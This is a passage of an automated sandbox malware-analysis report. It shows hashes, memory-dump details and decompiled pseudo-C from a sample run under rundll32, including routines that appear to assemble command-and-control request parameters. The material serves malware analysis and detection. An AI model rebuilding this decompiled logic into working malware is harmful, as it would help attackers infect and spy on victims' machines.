                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BE086773542215796F16BF4B808F6EBAD2BF60A80F05C414F68AD8055DA24C841EBD1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 0-3993045852
                                                                                                                                                                                                                                    • Opcode ID: 50d9980247dc17de92e6280303062191793e3f260dc067c5b675003308d062fe
                                                                                                                                                                                                                                    • Instruction ID: 105154be72ae107b8419f3536e73fca489a614f435dfab61f5e2477ae742e18b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50d9980247dc17de92e6280303062191793e3f260dc067c5b675003308d062fe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF8129B9A00205AFDB10CF99D884BAEB7F6EB4C312F148129F945E7240EB75EA55CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                                                                                                                    			E04C38B94(void* __eax, void* __ecx, void* __edx, intOrPtr _a4, unsigned int _a8, unsigned int* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* _t59;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                                                    				intOrPtr _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                                                    				intOrPtr _t73;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    				intOrPtr _t80;
                                                                                                                                                                                                                                    				intOrPtr _t84;
                                                                                                                                                                                                                                    				intOrPtr* _t86;
                                                                                                                                                                                                                                    				intOrPtr _t92;
                                                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                                                    				unsigned int _t103;
                                                                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                                                                    				intOrPtr* _t108;
                                                                                                                                                                                                                                    				intOrPtr* _t110;
                                                                                                                                                                                                                                    				intOrPtr* _t112;
                                                                                                                                                                                                                                    				intOrPtr* _t114;
                                                                                                                                                                                                                                    				intOrPtr _t116;
                                                                                                                                                                                                                                    				intOrPtr _t121;
                                                                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                                                                    				intOrPtr _t127;
                                                                                                                                                                                                                                    				intOrPtr* _t128;
                                                                                                                                                                                                                                    				void* _t129;
                                                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                                                    				void* _t140;
                                                                                                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                                                                                                    				intOrPtr _t143;
                                                                                                                                                                                                                                    				void* _t144;
                                                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                                                    				void* _t147;
                                                                                                                                                                                                                                    				intOrPtr* _t148;
                                                                                                                                                                                                                                    				intOrPtr* _t149;
                                                                                                                                                                                                                                    				intOrPtr* _t152;
                                                                                                                                                                                                                                    				void* _t153;
                                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t138 = __edx;
                                                                                                                                                                                                                                    				_t129 = __ecx;
                                                                                                                                                                                                                                    				_t59 = __eax;
                                                                                                                                                                                                                                    				_v12 = 8;
                                                                                                                                                                                                                                    				if(__eax == 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t60 =  *0x4c3d018; // 0x99d5691b
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t61 =  *0x4c3d014; // 0x3a87c8cd
                                                                                                                                                                                                                                    				_t127 = _a16;
                                                                                                                                                                                                                                    				_t146 =  *0x4c3d120; // 0x73fcc740
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t62 =  *0x4c3d010; // 0xd8d2f808
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t63 =  *0x4c3d00c; // 0x62819102
                                                                                                                                                                                                                                    				asm("bswap eax");
                                                                                                                                                                                                                                    				_t64 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t3 = _t64 + 0x4c3e633; // 0x74666f73
                                                                                                                                                                                                                                    				_t139 =  *_t146(_t127, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x4c3d02c,  *0x4c3d004, _t59);
                                                                                                                                                                                                                                    				_t68 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t4 = _t68 + 0x4c3e673; // 0x74707526
                                                                                                                                                                                                                                    				_t71 =  *_t146(_t139 + _t127, _t4, E04C31C1A());
                                                                                                                                                                                                                                    				_t155 = _t153 + 0x38;
                                                                                                                                                                                                                                    				_t140 = _t139 + _t71; // executed
                                                                                                                                                                                                                                    				_t72 = E04C354BC(_t129); // executed
                                                                                                                                                                                                                                    				_t128 = __imp__; // 0x76d25520
                                                                                                                                                                                                                                    				_v8 = _t72;
                                                                                                                                                                                                                                    				if(_t72 != 0) {
                                                                                                                                                                                                                                    					_t121 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    					_t7 = _t121 + 0x4c3e8eb; // 0x736e6426
                                                                                                                                                                                                                                    					_t125 =  *_t146(_a16 + _t140, _t7, _t72);
                                                                                                                                                                                                                                    					_t155 = _t155 + 0xc;
                                                                                                                                                                                                                                    					_t140 = _t140 + _t125;
                                                                                                                                                                                                                                    					 *_t128( *0x4c3d238, 0, _v8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t73 = E04C37649();
                                                                                                                                                                                                                                    				_v8 = _t73;
                                                                                                                                                                                                                                    				if(_t73 != 0) {
                                                                                                                                                                                                                                    					_t116 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    					_t11 = _t116 + 0x4c3e8f3; // 0x6f687726
                                                                                                                                                                                                                                    					 *_t146(_t140 + _a16, _t11, _t73);
                                                                                                                                                                                                                                    					_t155 = _t155 + 0xc;
                                                                                                                                                                                                                                    					 *_t128( *0x4c3d238, 0, _v8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t141 =  *0x4c3d32c; // 0x6c695b0
                                                                                                                                                                                                                                    				_t75 = E04C39395(0x4c3d00a, _t141 + 4);
                                                                                                                                                                                                                                    				_t147 = 0;
                                                                                                                                                                                                                                    				_v20 = _t75;
                                                                                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                                                                                    					L26:
                                                                                                                                                                                                                                    					 *_t128( *0x4c3d238, _t147, _a16); // executed
                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					__imp__( *0x4c3d238, 0, 0x800);
                                                                                                                                                                                                                                    					_v8 = _t75;
                                                                                                                                                                                                                                    					if(_t75 == 0) {
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, _t147, _v20);
                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					E04C37A80(_t75);
                                                                                                                                                                                                                                    					_t80 =  *0x4c3d32c; // 0x6c695b0
                                                                                                                                                                                                                                    					__imp__(_t80 + 0x40);
                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    					_t84 =  *0x4c3d32c; // 0x6c695b0
                                                                                                                                                                                                                                    					__imp__(_t84 + 0x40);
                                                                                                                                                                                                                                    					_t86 =  *0x4c3d32c; // 0x6c695b0
                                                                                                                                                                                                                                    					_t143 = E04C38307(1, _t138, _a16,  *_t86);
                                                                                                                                                                                                                                    					_v28 = _t143;
                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    					if(_t143 == 0) {
                                                                                                                                                                                                                                    						L24:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, _t147, _v8);
                                                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *0x4c3d104(_t143, 0x4c3c2ac);
                                                                                                                                                                                                                                    					_push(_t143);
                                                                                                                                                                                                                                    					_t92 = E04C33CC8();
                                                                                                                                                                                                                                    					_v16 = _t92;
                                                                                                                                                                                                                                    					if(_t92 == 0) {
                                                                                                                                                                                                                                    						L23:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, _t147, _t143);
                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t148 = __imp__; // 0x76d68170
                                                                                                                                                                                                                                    					 *_t148(_t143, _a4);
                                                                                                                                                                                                                                    					 *_t148(_v8, _v20);
                                                                                                                                                                                                                                    					_t149 = __imp__; // 0x76d681d0
                                                                                                                                                                                                                                    					 *_t149(_v8, _v16);
                                                                                                                                                                                                                                    					 *_t149(_v8, _t143);
                                                                                                                                                                                                                                    					_t99 = E04C3809F(0, _v8);
                                                                                                                                                                                                                                    					_a4 = _t99;
                                                                                                                                                                                                                                    					if(_t99 == 0) {
                                                                                                                                                                                                                                    						_v12 = 8;
                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                    						E04C3A1B0();
                                                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                                                    						 *_t128( *0x4c3d238, 0, _v16);
                                                                                                                                                                                                                                    						_t147 = 0;
                                                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t103 = E04C343DF(_t128, 0xffffffffffffffff, _t143,  &_v24); // executed
                                                                                                                                                                                                                                    					_v12 = _t103;
                                                                                                                                                                                                                                    					if(_t103 == 0) {
                                                                                                                                                                                                                                    						_t152 = _v24;
                                                                                                                                                                                                                                    						_t107 = E04C3163F(_t152, _a4, _a8, _a12); // executed
                                                                                                                                                                                                                                    						_v12 = _t107;
                                                                                                                                                                                                                                    						_t108 =  *((intOrPtr*)(_t152 + 8));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t108 + 0x80))(_t108);
                                                                                                                                                                                                                                    						_t110 =  *((intOrPtr*)(_t152 + 8));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t110 + 8))(_t110);
                                                                                                                                                                                                                                    						_t112 =  *((intOrPtr*)(_t152 + 4));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t112 + 8))(_t112);
                                                                                                                                                                                                                                    						_t114 =  *_t152;
                                                                                                                                                                                                                                    						_t103 = E04C39039( *((intOrPtr*)( *_t114 + 8))(_t114), _t152);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						if(_v12 == 0) {
                                                                                                                                                                                                                                    							_t103 = _a8;
                                                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                                                    								_t144 =  *_t103;
                                                                                                                                                                                                                                    								_t150 =  *_a12;
                                                                                                                                                                                                                                    								_push( *_a12);
                                                                                                                                                                                                                                    								_push(_t144);
                                                                                                                                                                                                                                    								_push(_t144);
                                                                                                                                                                                                                                    								L04C38F0A();
                                                                                                                                                                                                                                    								_t103 = E04C385DB(_t144, _t144, _t150 >> 1);
                                                                                                                                                                                                                                    								_t143 = _v28;
                                                                                                                                                                                                                                    								 *_a12 = _t103;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                                    							E04C39039(_t103, _a4);
                                                                                                                                                                                                                                    							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}




















































                                                                                                                                                                                                                                    0x04c38df7
                                                                                                                                                                                                                                    0x04c38df9
                                                                                                                                                                                                                                    0x04c38dfa
                                                                                                                                                                                                                                    0x04c38dfb
                                                                                                                                                                                                                                    0x04c38dfc
                                                                                                                                                                                                                                    0x04c38e09
                                                                                                                                                                                                                                    0x04c38e11
                                                                                                                                                                                                                                    0x04c38e14
                                                                                                                                                                                                                                    0x04c38e14
                                                                                                                                                                                                                                    0x04c38df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38ddb
                                                                                                                                                                                                                                    0x04c38ddf
                                                                                                                                                                                                                                    0x04c38e16
                                                                                                                                                                                                                                    0x04c38e19
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38e22
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c38de1
                                                                                                                                                                                                                                    0x04c38dd9

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction ID: ba185fc3ce7b046f8885aab4a7c747515c20991a6456bb4a3e0796eab837ba10
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ab115f6b12d1be0a676ffda2d84a31a7805ced252a4b39bfb77174288d21c38
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B913979900208AFDB11EFA8DC84BAE7BBAEF48356F144054F806E7260D739ED51DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction ID: 8bc5be279adfe0f928f2cb0fe5d72ab4901e5e428f30d82630db07478df0ce62
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a1ed7b2f27d42fc66abf805b3d32d8e1b3911db34e81b7bd641a30a88d9ef35f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB814AB6D00119AFDF11DFA5DC84AEEBBBAFB48302F144166E506E6250DB35AE44CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E04C3225B(signed int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                                                    				signed int _t41;
                                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                    				signed char _t53;
                                                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t58 = __edx;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t21 = E04C3550E();
                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                    					_t56 =  *0x4c3d25c; // 0x4000000a
                                                                                                                                                                                                                                    					_t52 = (_t56 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    					 *0x4c3d25c = (_t56 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t22 =  *0x4c3d164(0, 2);
                                                                                                                                                                                                                                    				_v16 = _t22;
                                                                                                                                                                                                                                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                    					_t25 = E04C33D0D( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                    					_t51 = _t25;
                                                                                                                                                                                                                                    					_t26 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    					if( *0x4c3d25c > 5) {
                                                                                                                                                                                                                                    						_t8 = _t26 + 0x4c3e5cd; // 0x4d283a53
                                                                                                                                                                                                                                    						_t27 = _t8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t7 = _t26 + 0x4c3ea15; // 0x44283a44
                                                                                                                                                                                                                                    						_t27 = _t7;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E04C31BF4(_t27, _t27);
                                                                                                                                                                                                                                    					_t31 = E04C31B2F(_t58,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                    						__imp__(_v20);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t59 = 5;
                                                                                                                                                                                                                                    					if(_t51 != _t59) {
                                                                                                                                                                                                                                    						 *0x4c3d270 =  *0x4c3d270 ^ 0x81bbe65d;
                                                                                                                                                                                                                                    						_t32 = E04C32049(_t31, 0x60);
                                                                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                                                                    						 *0x4c3d32c = _t32;
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							L04C3A7BC();
                                                                                                                                                                                                                                    							_t47 =  *0x4c3d32c; // 0x6c695b0
                                                                                                                                                                                                                                    							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                    							__imp__(_t47 + 0x40, _t32, 0, 0x60);
                                                                                                                                                                                                                                    							_t49 =  *0x4c3d32c; // 0x6c695b0
                                                                                                                                                                                                                                    							 *_t49 = 0x4c3e836;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						_t51 = 0;
                                                                                                                                                                                                                                    						if(0 == 0) {
                                                                                                                                                                                                                                    							__imp__( *0x4c3d238, 0, 0x43);
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							 *0x4c3d2c4 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								_push(8);
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t53 =  *0x4c3d25c; // 0x4000000a
                                                                                                                                                                                                                                    								_t58 = _t53 & 0x000000ff;
                                                                                                                                                                                                                                    								_t55 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    								_t13 = _t55 + 0x4c3e55a; // 0x697a6f4d
                                                                                                                                                                                                                                    								_t52 = _t13;
                                                                                                                                                                                                                                    								 *0x4c3d120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x4c3c2a7);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							_t51 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								E04C3269C( ~_v8 &  *0x4c3d270, 0x4c3d00c); // executed
                                                                                                                                                                                                                                    								_t41 = E04C34094(_t52); // executed
                                                                                                                                                                                                                                    								_t51 = _t41;
                                                                                                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                                                                                                    								if(_t51 != 0) {
                                                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t42 = E04C396A4(_t52); // executed
                                                                                                                                                                                                                                    								__eflags = _t42;
                                                                                                                                                                                                                                    								if(_t42 != 0) {
                                                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                                                    									_t62 = _v12;
                                                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                    										_t43 = E04C36786(_t58, _t62, _v8); // executed
                                                                                                                                                                                                                                    										_t51 = _t43;
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags = _t62;
                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t45 = E04C33DD9(__eflags, _t62 + 4); // executed
                                                                                                                                                                                                                                    									_t51 = _t45;
                                                                                                                                                                                                                                    									__eflags = _t51;
                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t51 = 8;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t63 = _v12;
                                                                                                                                                                                                                                    						if(_t63 == 0) {
                                                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                                                    							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                    								 *0x4c3d160();
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t64 = _t63 + 4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    						} while (E04C3A501(_t59, _t64, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t51 = _t22;
                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                    					return _t51;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x04c322e5
                                                                                                                                                                                                                                    0x04c322ec
                                                                                                                                                                                                                                    0x04c322f1
                                                                                                                                                                                                                                    0x04c322f1
                                                                                                                                                                                                                                    0x04c322f9
                                                                                                                                                                                                                                    0x04c322fc
                                                                                                                                                                                                                                    0x04c32322
                                                                                                                                                                                                                                    0x04c3232e
                                                                                                                                                                                                                                    0x04c32333
                                                                                                                                                                                                                                    0x04c32335
                                                                                                                                                                                                                                    0x04c3233a
                                                                                                                                                                                                                                    0x04c32366
                                                                                                                                                                                                                                    0x04c32368
                                                                                                                                                                                                                                    0x04c3233c
                                                                                                                                                                                                                                    0x04c32340
                                                                                                                                                                                                                                    0x04c32345
                                                                                                                                                                                                                                    0x04c3234a
                                                                                                                                                                                                                                    0x04c32351
                                                                                                                                                                                                                                    0x04c32357
                                                                                                                                                                                                                                    0x04c3235c
                                                                                                                                                                                                                                    0x04c32362
                                                                                                                                                                                                                                    0x04c32369
                                                                                                                                                                                                                                    0x04c3236b
                                                                                                                                                                                                                                    0x04c3236d
                                                                                                                                                                                                                                    0x04c3237c
                                                                                                                                                                                                                                    0x04c32382
                                                                                                                                                                                                                                    0x04c32384
                                                                                                                                                                                                                                    0x04c32389
                                                                                                                                                                                                                                    0x04c323b9
                                                                                                                                                                                                                                    0x04c323bb
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c3238b
                                                                                                                                                                                                                                    0x04c32391
                                                                                                                                                                                                                                    0x04c3239e
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323a4
                                                                                                                                                                                                                                    0x04c323ac
                                                                                                                                                                                                                                    0x04c323b5
                                                                                                                                                                                                                                    0x04c323bc
                                                                                                                                                                                                                                    0x04c323be
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c323c7
                                                                                                                                                                                                                                    0x04c323d4
                                                                                                                                                                                                                                    0x04c323d9
                                                                                                                                                                                                                                    0x04c323de
                                                                                                                                                                                                                                    0x04c323e0
                                                                                                                                                                                                                                    0x04c323e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c323e4
                                                                                                                                                                                                                                    0x04c323e9
                                                                                                                                                                                                                                    0x04c323eb
                                                                                                                                                                                                                                    0x04c323f2
                                                                                                                                                                                                                                    0x04c323f6
                                                                                                                                                                                                                                    0x04c323f9
                                                                                                                                                                                                                                    0x04c3240e
                                                                                                                                                                                                                                    0x04c32412
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32417
                                                                                                                                                                                                                                    0x04c323fb
